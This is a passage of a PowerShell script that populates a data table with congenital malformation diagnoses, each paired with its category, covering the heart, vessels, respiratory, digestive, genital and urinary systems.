congenital malformations of heart","Levocardia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of heart","Cor triatriatum") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of heart","Pulmonary infundibular stenosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of heart","Congenital subaortic stenosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of heart","Malformation of coronary vessels") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of heart","Congenital heart block") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of heart","Other specified congenital malformations of heart") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of heart","Congenital malformation of heart, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great arteries","Patent ductus arteriosus") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great arteries","Coarctation of aorta") + $null = $DiagnosisList.Rows.Add("Atresia of aorta","Interruption of aortic arch") + $null = $DiagnosisList.Rows.Add("Atresia of aorta","Other atresia of aorta") + $null = $DiagnosisList.Rows.Add("Supravalvular aortic stenosis","Supravalvular aortic stenosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Congenital malformation of aorta unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Absence and aplasia of aorta") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Hypoplasia of aorta") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Congenital aneurysm of aorta") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Congenital dilation of aorta") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Double aortic arch") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Tortuous aortic arch") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Right aortic arch") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Anomalous origin of subclavian artery") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of aorta","Other congenital malformations of aorta") + $null = $DiagnosisList.Rows.Add("Atresia of pulmonary artery","Atresia of pulmonary artery") + $null = $DiagnosisList.Rows.Add("Stenosis of pulmonary artery","Stenosis of pulmonary artery") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of pulmonary artery","Coarctation of pulmonary artery") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of pulmonary artery","Congenital pulmonary arteriovenous malformation") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of pulmonary artery","Other congenital malformations of pulmonary artery") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of other great arteries","Other congenital malformations of other great arteries") + $null = $DiagnosisList.Rows.Add("Congenital malformation of great arteries, unspecified","Congenital malformation of great arteries, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great veins","Congenital stenosis of vena cava") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great veins","Persistent left superior vena cava") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great veins","Total anomalous pulmonary venous connection") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great veins","Partial anomalous pulmonary venous connection") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great veins","Anomalous pulmonary venous connection, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great veins","Anomalous portal venous connection") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great veins","Portal vein-hepatic artery fistula") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great veins","Other congenital malformations of great veins") + $null = $DiagnosisList.Rows.Add("Congenital malformations of great veins","Congenital malformation of great vein, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of peripheral vascular system","Congenital absence and hypoplasia of umbilical artery") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of peripheral vascular system","Congenital renal artery stenosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of peripheral vascular system","Other congenital malformations of renal artery") + $null = $DiagnosisList.Rows.Add("Arteriovenous malformation (peripheral)","Arteriovenous malformation, site unspecified") + $null = $DiagnosisList.Rows.Add("Arteriovenous malformation (peripheral)","Arteriovenous malformation of vessel of upper limb") + $null = $DiagnosisList.Rows.Add("Arteriovenous malformation (peripheral)","Arteriovenous malformation of vessel of lower limb") + $null = $DiagnosisList.Rows.Add("Arteriovenous malformation (peripheral)","Arteriovenous malformation of digestive system vessel") + $null = $DiagnosisList.Rows.Add("Arteriovenous malformation (peripheral)","Arteriovenous malformation of renal vessel") + $null = $DiagnosisList.Rows.Add("Arteriovenous malformation (peripheral)","Arteriovenous malformation, other site") + $null = $DiagnosisList.Rows.Add("Congenital phlebectasia","Congenital phlebectasia") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformations of peripheral vascular system","Other specified congenital malformations of peripheral vascular system") + $null = $DiagnosisList.Rows.Add("Congenital malformation of peripheral vascular system, unspecified","Congenital malformation of peripheral vascular system, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of circulatory system","Arteriovenous malformation of precerebral vessels") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of circulatory system","Other malformations of precerebral vessels") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of circulatory system","Arteriovenous malformation of cerebral vessels") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of circulatory system","Other malformations of cerebral vessels") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of circulatory system","Other specified congenital malformations of circulatory system") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of circulatory system","Congenital malformation of circulatory system, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of nose","Choanal atresia") + $null = $DiagnosisList.Rows.Add("Congenital malformations of nose","Agenesis and underdevelopment of nose") + $null = $DiagnosisList.Rows.Add("Congenital malformations of nose","Fissured, notched and cleft nose") + $null = $DiagnosisList.Rows.Add("Congenital malformations of nose","Congenital perforated nasal septum") + $null = $DiagnosisList.Rows.Add("Congenital malformations of nose","Other congenital malformations of nose") + $null = $DiagnosisList.Rows.Add("Congenital malformations of nose","Congenital malformation of nose, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of larynx","Web of larynx") + $null = $DiagnosisList.Rows.Add("Congenital malformations of larynx","Congenital subglottic stenosis") + $null = $DiagnosisList.Rows.Add("Congenital malformations of larynx","Laryngeal hypoplasia") + $null = $DiagnosisList.Rows.Add("Congenital malformations of larynx","Laryngocele") + $null = $DiagnosisList.Rows.Add("Congenital malformations of larynx","Congenital laryngomalacia") + $null = $DiagnosisList.Rows.Add("Congenital malformations of larynx","Other congenital malformations of larynx") + $null = $DiagnosisList.Rows.Add("Congenital malformations of larynx","Congenital malformation of larynx, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of trachea and bronchus","Congenital tracheomalacia") + $null = $DiagnosisList.Rows.Add("Congenital malformations of trachea and bronchus","Other congenital malformations of trachea") + $null = $DiagnosisList.Rows.Add("Congenital malformations of trachea and bronchus","Congenital bronchomalacia") + $null = $DiagnosisList.Rows.Add("Congenital malformations of trachea and bronchus","Congenital stenosis of bronchus") + $null = $DiagnosisList.Rows.Add("Congenital malformations of trachea and bronchus","Other congenital malformations of bronchus") + $null = $DiagnosisList.Rows.Add("Congenital malformations of lung","Congenital cystic lung") + $null = $DiagnosisList.Rows.Add("Congenital malformations of lung","Accessory lobe of lung") + $null = $DiagnosisList.Rows.Add("Congenital malformations of lung","Sequestration of lung") + $null = $DiagnosisList.Rows.Add("Congenital malformations of lung","Agenesis of lung") + $null = $DiagnosisList.Rows.Add("Congenital malformations of lung","Congenital bronchiectasis") + $null = $DiagnosisList.Rows.Add("Congenital malformations of lung","Ectopic tissue in lung") + $null = $DiagnosisList.Rows.Add("Congenital malformations of lung","Congenital hypoplasia and dysplasia of lung") + $null = $DiagnosisList.Rows.Add("Congenital malformations of lung","Other congenital malformations of lung") + $null = $DiagnosisList.Rows.Add("Congenital malformations of lung","Congenital malformation of lung, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of respiratory system","Anomaly of pleura") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of respiratory system","Congenital cyst of mediastinum") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of respiratory system","Other specified congenital malformations of respiratory system") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of respiratory system","Congenital malformation of respiratory system, unspecified") + $null = $DiagnosisList.Rows.Add("Cleft palate","Cleft hard palate") + $null = $DiagnosisList.Rows.Add("Cleft palate","Cleft soft palate") + $null = $DiagnosisList.Rows.Add("Cleft palate","Cleft hard palate with cleft soft palate") + $null = $DiagnosisList.Rows.Add("Cleft palate","Cleft uvula") + $null = $DiagnosisList.Rows.Add("Cleft palate","Cleft palate, unspecified") + $null = $DiagnosisList.Rows.Add("Cleft lip","Cleft lip, bilateral") + $null = $DiagnosisList.Rows.Add("Cleft lip","Cleft lip, median") + $null = $DiagnosisList.Rows.Add("Cleft lip","Cleft lip, unilateral") + $null = $DiagnosisList.Rows.Add("Cleft palate with cleft lip","Cleft hard palate with bilateral cleft lip") + $null = $DiagnosisList.Rows.Add("Cleft palate with cleft lip","Cleft hard palate with unilateral cleft lip") + $null = $DiagnosisList.Rows.Add("Cleft palate with cleft lip","Cleft soft palate with bilateral cleft lip") + $null = $DiagnosisList.Rows.Add("Cleft palate with cleft lip","Cleft soft palate with unilateral cleft lip") + $null = $DiagnosisList.Rows.Add("Cleft palate with cleft lip","Cleft hard and soft palate with bilateral cleft lip") + $null = $DiagnosisList.Rows.Add("Cleft palate with cleft lip","Cleft hard and soft palate with unilateral cleft lip") + $null = $DiagnosisList.Rows.Add("Cleft palate with cleft lip","Unspecified cleft palate with bilateral cleft lip") + $null = $DiagnosisList.Rows.Add("Cleft palate with cleft lip","Unspecified cleft palate with unilateral cleft lip") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of tongue, mouth and pharynx","Congenital malformations of lips, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of tongue, mouth and pharynx","Ankyloglossia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of tongue, mouth and pharynx","Macroglossia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of tongue, mouth and pharynx","Other congenital malformations of tongue") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of tongue, mouth and pharynx","Congenital malformations of salivary glands and ducts") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of tongue, mouth and pharynx","Congenital malformations of palate, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of tongue, mouth and pharynx","Other congenital malformations of mouth") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of tongue, mouth and pharynx","Congenital pharyngeal pouch") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of tongue, mouth and pharynx","Other congenital malformations of pharynx") + $null = $DiagnosisList.Rows.Add("Congenital malformations of esophagus","Atresia of esophagus without fistula") + $null = $DiagnosisList.Rows.Add("Congenital malformations of esophagus","Atresia of esophagus with tracheo-esophageal fistula") + $null = $DiagnosisList.Rows.Add("Congenital malformations of esophagus","Congenital tracheo-esophageal fistula without atresia") + $null = $DiagnosisList.Rows.Add("Congenital malformations of esophagus","Congenital stenosis and stricture of esophagus") + $null = $DiagnosisList.Rows.Add("Congenital malformations of esophagus","Esophageal web") + $null = $DiagnosisList.Rows.Add("Congenital malformations of esophagus","Congenital dilatation of esophagus") + $null = $DiagnosisList.Rows.Add("Congenital malformations of esophagus","Congenital diverticulum of esophagus") + $null = $DiagnosisList.Rows.Add("Congenital malformations of esophagus","Other congenital malformations of esophagus") + $null = $DiagnosisList.Rows.Add("Congenital malformations of esophagus","Congenital malformation of esophagus, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of upper alimentary tract","Congenital hypertrophic pyloric stenosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of upper alimentary tract","Congenital hiatus hernia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of upper alimentary tract","Other specified congenital malformations of stomach") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of upper alimentary tract","Congenital malformation of stomach, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of upper alimentary tract","Other specified congenital malformations of upper alimentary tract") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of upper alimentary tract","Congenital malformation of upper alimentary tract, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of small intestine","Congenital absence, atresia and stenosis of duodenum") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of small intestine","Congenital absence, atresia and stenosis of jejunum") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of small intestine","Congenital absence, atresia and stenosis of ileum") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of small intestine","Congenital absence, atresia and stenosis of other specified parts of small intestine") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of small intestine","Congenital absence, atresia and stenosis of small intestine, part unspecified") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of large intestine","Congenital absence, atresia and stenosis of rectum with fistula") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of large intestine","Congenital absence, atresia and stenosis of rectum without fistula") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of large intestine","Congenital absence, atresia and stenosis of anus with fistula") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of large intestine","Congenital absence, atresia and stenosis of anus without fistula") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of large intestine","Congenital absence, atresia and stenosis of other parts of large intestine") + $null = $DiagnosisList.Rows.Add("Congenital absence, atresia and stenosis of large intestine","Congenital absence, atresia and stenosis of large intestine, part unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Meckel's diverticulum (displaced) (hypertrophic)") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Hirschsprung's disease") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Other congenital functional disorders of colon") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Congenital malformations of intestinal fixation") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Duplication of intestine") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Ectopic anus") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Congenital fistula of rectum and anus") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Persistent cloaca") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Other specified congenital malformations of intestine") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of intestine","Congenital malformation of intestine, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of gallbladder, bile ducts and liver","Agenesis, aplasia and hypoplasia of gallbladder") + $null = $DiagnosisList.Rows.Add("Congenital malformations of gallbladder, bile ducts and liver","Other congenital malformations of gallbladder") + $null = $DiagnosisList.Rows.Add("Congenital malformations of gallbladder, bile ducts and liver","Atresia of bile ducts") + $null = $DiagnosisList.Rows.Add("Congenital malformations of gallbladder, bile ducts and liver","Congenital stenosis and stricture of bile ducts") + $null = $DiagnosisList.Rows.Add("Congenital malformations of gallbladder, bile ducts and liver","Choledochal cyst") + $null = $DiagnosisList.Rows.Add("Congenital malformations of gallbladder, bile ducts and liver","Other congenital malformations of bile ducts") + $null = $DiagnosisList.Rows.Add("Congenital malformations of gallbladder, bile ducts and liver","Cystic disease of liver") + $null = $DiagnosisList.Rows.Add("Congenital malformations of gallbladder, bile ducts and liver","Other congenital malformations of liver") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of digestive system","Agenesis, aplasia and hypoplasia of pancreas") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of digestive system","Annular pancreas") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of digestive system","Congenital pancreatic cyst") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of digestive system","Other congenital malformations of pancreas and pancreatic duct") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of digestive system","Other specified congenital malformations of digestive system") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of digestive system","Congenital malformation of digestive system, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital absence of ovary","Congenital absence of ovary, unilateral") + $null = $DiagnosisList.Rows.Add("Congenital absence of ovary","Congenital absence of ovary, bilateral") + $null = $DiagnosisList.Rows.Add("Developmental ovarian cyst","Developmental ovarian cyst") + $null = $DiagnosisList.Rows.Add("Congenital torsion of ovary","Congenital torsion of ovary") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ovary","Accessory ovary") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ovary","Ovarian streak") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ovary","Other congenital malformation of ovary") + $null = $DiagnosisList.Rows.Add("Embryonic cyst of fallopian tube","Embryonic cyst of fallopian tube") + $null = $DiagnosisList.Rows.Add("Embryonic cyst of broad ligament","Embryonic cyst of broad ligament") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of fallopian tube and broad ligament","Other congenital malformations of fallopian tube and broad ligament") + $null = $DiagnosisList.Rows.Add("Congenital malformations of uterus and cervix","Agenesis and aplasia of uterus") + $null = $DiagnosisList.Rows.Add("Doubling of uterus with doubling of cervix and vagina","Doubling of uterus with doubling of cervix and vagina without obstruction") + $null = $DiagnosisList.Rows.Add("Doubling of uterus with doubling of cervix and vagina","Doubling of uterus with doubling of cervix and vagina with obstruction") + $null = $DiagnosisList.Rows.Add("Other doubling of uterus","Other doubling of uterus") + $null = $DiagnosisList.Rows.Add("Bicornate uterus","Bicornate uterus") + $null = $DiagnosisList.Rows.Add("Unicornate uterus","Unicornate uterus") + $null = $DiagnosisList.Rows.Add("Agenesis and aplasia of cervix","Agenesis and aplasia of cervix") + $null = $DiagnosisList.Rows.Add("Embryonic cyst of cervix","Embryonic cyst of cervix") + $null = $DiagnosisList.Rows.Add("Congenital fistulae between uterus and digestive and urinary tracts","Congenital fistulae between uterus and digestive and urinary tracts") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of uterus","Arcuate uterus") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of uterus","Hypoplasia of uterus") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of uterus","Other congenital malformations of uterus") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of cervix","Cervical duplication") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of cervix","Hypoplasia of cervix") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of cervix","Other congenital malformations of cervix") + $null = $DiagnosisList.Rows.Add("Congenital malformation of uterus and cervix, unspecified","Congenital malformation of uterus and cervix, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of female genitalia","Congenital absence of vagina") + $null = $DiagnosisList.Rows.Add("Doubling of vagina","Doubling of vagina, unspecified") + $null = $DiagnosisList.Rows.Add("Doubling of vagina","Transverse vaginal septum") + $null = $DiagnosisList.Rows.Add("Longitudinal vaginal septum","Longitudinal vaginal septum, nonobstructing") + $null = $DiagnosisList.Rows.Add("Longitudinal vaginal septum","Longitudinal vaginal septum, obstructing, right side") + $null = $DiagnosisList.Rows.Add("Longitudinal vaginal septum","Longitudinal vaginal septum, obstructing, left side") + $null = $DiagnosisList.Rows.Add("Longitudinal vaginal septum","Longitudinal vaginal septum, microperforate, right side") + $null = $DiagnosisList.Rows.Add("Longitudinal vaginal septum","Longitudinal vaginal septum, microperforate, left side") + $null = $DiagnosisList.Rows.Add("Longitudinal vaginal septum","Other and unspecified longitudinal vaginal septum") + $null = $DiagnosisList.Rows.Add("Congenital rectovaginal fistula","Congenital rectovaginal fistula") + $null = $DiagnosisList.Rows.Add("Imperforate hymen","Imperforate hymen") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of vagina","Other congenital malformations of vagina") + $null = $DiagnosisList.Rows.Add("Fusion of labia","Fusion of labia") + $null = $DiagnosisList.Rows.Add("Congenital malformation of clitoris","Congenital malformation of clitoris") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of vulva","Unspecified congenital malformations of vulva") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of vulva","Congenital absence of vulva") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of vulva","Other congenital malformations of vulva") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformations of female genitalia","Other specified congenital malformations of female genitalia") + $null = $DiagnosisList.Rows.Add("Congenital malformation of female genitalia, unspecified","Congenital malformation of female genitalia, unspecified") + $null = $DiagnosisList.Rows.Add("Ectopic testis","Ectopic testis, unspecified") + $null = $DiagnosisList.Rows.Add("Ectopic testis","Ectopic testis, unilateral") + $null = $DiagnosisList.Rows.Add("Ectopic testis","Ectopic testes, bilateral") + $null = $DiagnosisList.Rows.Add("Undescended testicle, unilateral","Unspecified undescended testicle, unilateral") + $null = $DiagnosisList.Rows.Add("Abdominal testis, unilateral","Unilateral intraabdominal testis") + $null = $DiagnosisList.Rows.Add("Abdominal testis, unilateral","Unilateral inguinal testis") + $null = $DiagnosisList.Rows.Add("Ectopic perineal testis, unilateral","Ectopic perineal testis, unilateral") + $null = $DiagnosisList.Rows.Add("Unilateral high scrotal testis","Unilateral high scrotal testis") + $null = $DiagnosisList.Rows.Add("Undescended testicle, bilateral","Undescended testicle, unspecified, bilateral") + $null = $DiagnosisList.Rows.Add("Abdominal testis, bilateral","Bilateral intraabdominal testes") + $null = $DiagnosisList.Rows.Add("Abdominal testis, bilateral","Bilateral inguinal testes") + $null = $DiagnosisList.Rows.Add("Ectopic perineal testis, bilateral","Ectopic perineal testis, bilateral") + $null = $DiagnosisList.Rows.Add("Bilateral high scrotal testes","Bilateral high scrotal testes") + $null = $DiagnosisList.Rows.Add("Undescended testicle, unspecified","Undescended testicle, unspecified") + $null = $DiagnosisList.Rows.Add("Hypospadias","Hypospadias, balanic") + $null = $DiagnosisList.Rows.Add("Hypospadias","Hypospadias, penile") + $null = $DiagnosisList.Rows.Add("Hypospadias","Hypospadias, penoscrotal") + $null = $DiagnosisList.Rows.Add("Hypospadias","Hypospadias, perineal") + $null = $DiagnosisList.Rows.Add("Hypospadias","Congenital chordee") + $null = $DiagnosisList.Rows.Add("Hypospadias","Other hypospadias") + $null = $DiagnosisList.Rows.Add("Hypospadias","Hypospadias, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of male genital organs","Absence and aplasia of testis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of male genital organs","Hypoplasia of testis and scrotum") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of testis and scrotum","Unspecified congenital malformations of testis and scrotum") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of testis and scrotum","Polyorchism") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of testis and scrotum","Retractile testis") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of testis and scrotum","Scrotal transposition") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of testis and scrotum","Other congenital malformations of testis and scrotum") + $null = $DiagnosisList.Rows.Add("Atresia of vas deferens","Atresia of vas deferens") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of vas deferens, epididymis, seminal vesicles and prostate","Other congenital malformations of vas deferens, epididymis, seminal vesicles and prostate") + $null = $DiagnosisList.Rows.Add("Congenital absence and aplasia of penis","Congenital absence and aplasia of penis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of penis","Curvature of penis (lateral)") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of penis","Hypoplasia of penis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of penis","Congenital torsion of penis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of penis","Hidden penis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of penis","Other congenital malformation of penis") + $null = $DiagnosisList.Rows.Add("Congenital vasocutaneous fistula","Congenital vasocutaneous fistula") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformations of male genital organs","Other specified congenital malformations of male genital organs") + $null = $DiagnosisList.Rows.Add("Congenital malformation of male genital organ, unspecified","Congenital malformation of male genital organ, unspecified") + $null = $DiagnosisList.Rows.Add("Indeterminate sex and pseudohermaphroditism","Hermaphroditism, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Indeterminate sex and pseudohermaphroditism","Male pseudohermaphroditism, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Indeterminate sex and pseudohermaphroditism","Female pseudohermaphroditism, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Indeterminate sex and pseudohermaphroditism","Pseudohermaphroditism, unspecified") + $null = $DiagnosisList.Rows.Add("Indeterminate sex and pseudohermaphroditism","Indeterminate sex, unspecified") + $null = $DiagnosisList.Rows.Add("Renal agenesis and other reduction defects of kidney","Renal agenesis, unilateral") + $null = $DiagnosisList.Rows.Add("Renal agenesis and other reduction defects of kidney","Renal agenesis, bilateral") + $null = $DiagnosisList.Rows.Add("Renal agenesis and other reduction defects of kidney","Renal agenesis, unspecified") + $null = $DiagnosisList.Rows.Add("Renal agenesis and other reduction defects of kidney","Renal hypoplasia, unilateral") + $null = $DiagnosisList.Rows.Add("Renal agenesis and other reduction defects of kidney","Renal hypoplasia, bilateral") + $null = $DiagnosisList.Rows.Add("Renal agenesis and other reduction defects of kidney","Renal hypoplasia, unspecified") + $null = $DiagnosisList.Rows.Add("Renal agenesis and other reduction defects of kidney","Potter's syndrome") + $null = $DiagnosisList.Rows.Add("Congenital renal cyst","Congenital renal cyst, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital renal cyst","Congenital single renal cyst") + $null = $DiagnosisList.Rows.Add("Congenital renal cyst","Congenital multiple renal cysts") + $null = $DiagnosisList.Rows.Add("Polycystic kidney, infantile type","Cystic dilatation of collecting ducts") + $null = $DiagnosisList.Rows.Add("Polycystic kidney, infantile type","Other polycystic kidney, infantile type") + $null = $DiagnosisList.Rows.Add("Polycystic kidney, adult type","Polycystic kidney, adult type") + $null = $DiagnosisList.Rows.Add("Polycystic kidney, unspecified","Polycystic kidney, unspecified") + $null = $DiagnosisList.Rows.Add("Renal dysplasia","Renal dysplasia") + $null = $DiagnosisList.Rows.Add("Medullary cystic kidney","Medullary cystic kidney") + $null = $DiagnosisList.Rows.Add("Other cystic kidney diseases","Other cystic kidney diseases") + $null = $DiagnosisList.Rows.Add("Cystic kidney disease, unspecified","Cystic kidney disease, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital obstructive defects of renal pelvis and congenital malformations of ureter","Congenital hydronephrosis") + $null = $DiagnosisList.Rows.Add("Congenital occlusion of ureter","Congenital occlusion of ureter, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital occlusion of ureter","Congenital occlusion of ureteropelvic junction") + $null = $DiagnosisList.Rows.Add("Congenital occlusion of ureter","Congenital occlusion of ureterovesical orifice") + $null = $DiagnosisList.Rows.Add("Congenital megaureter","Congenital megaureter") + $null = $DiagnosisList.Rows.Add("Other obstructive defects of renal pelvis and ureter","Congenital ureterocele, orthotopic") + $null = $DiagnosisList.Rows.Add("Other obstructive defects of renal pelvis and ureter","Cecoureterocele") + $null = $DiagnosisList.Rows.Add("Other obstructive defects of renal pelvis and ureter","Other obstructive defects of renal pelvis and ureter") + $null = $DiagnosisList.Rows.Add("Agenesis of ureter","Agenesis of ureter") + $null = $DiagnosisList.Rows.Add("Duplication of ureter","Duplication of ureter") + $null = $DiagnosisList.Rows.Add("Malposition of ureter","Malposition of ureter, unspecified") + $null = $DiagnosisList.Rows.Add("Malposition of ureter","Deviation of ureter") + $null = $DiagnosisList.Rows.Add("Malposition of ureter","Displacement of ureter") + $null = $DiagnosisList.Rows.Add("Malposition of ureter","Anomalous implantation of ureter") + $null = $DiagnosisList.Rows.Add("Malposition of ureter","Other malposition of ureter") + $null = $DiagnosisList.Rows.Add("Congenital vesico-uretero-renal reflux","Congenital vesico-uretero-renal reflux") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ureter","Other congenital malformations of ureter") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of kidney","Accessory kidney") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of kidney","Lobulated, fused and horseshoe kidney") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of kidney","Ectopic kidney") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of kidney","Hyperplastic and giant kidney") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of kidney","Other specified congenital malformations of kidney") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of kidney","Congenital malformation of kidney, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of urinary system","Epispadias") + $null = $DiagnosisList.Rows.Add("Exstrophy of urinary bladder","Exstrophy of urinary bladder, unspecified") + $null = $DiagnosisList.Rows.Add("Exstrophy of urinary bladder","Supravesical fissure of urinary bladder") + $null = $DiagnosisList.Rows.Add("Exstrophy of urinary bladder","Cloacal exstrophy of urinary bladder") + $null = $DiagnosisList.Rows.Add("Exstrophy of urinary bladder","Other exstrophy of urinary bladder") + $null = $DiagnosisList.Rows.Add("Congenital posterior urethral valves","Congenital posterior urethral valves") + $null = $DiagnosisList.Rows.Add("Other atresia and stenosis of urethra and bladder neck","Congenital bladder neck obstruction") + $null = $DiagnosisList.Rows.Add("Other atresia and stenosis of urethra and bladder neck","Congenital stricture of urethra") + $null = $DiagnosisList.Rows.Add("Other atresia and stenosis of urethra and bladder neck","Congenital stricture of urinary meatus") + $null = $DiagnosisList.Rows.Add("Other atresia and stenosis of urethra and bladder neck","Other atresia and stenosis of urethra and bladder neck") + $null = $DiagnosisList.Rows.Add("Malformation of urachus","Malformation of urachus") + $null = $DiagnosisList.Rows.Add("Congenital absence of bladder and urethra","Congenital absence of bladder and urethra") + $null = 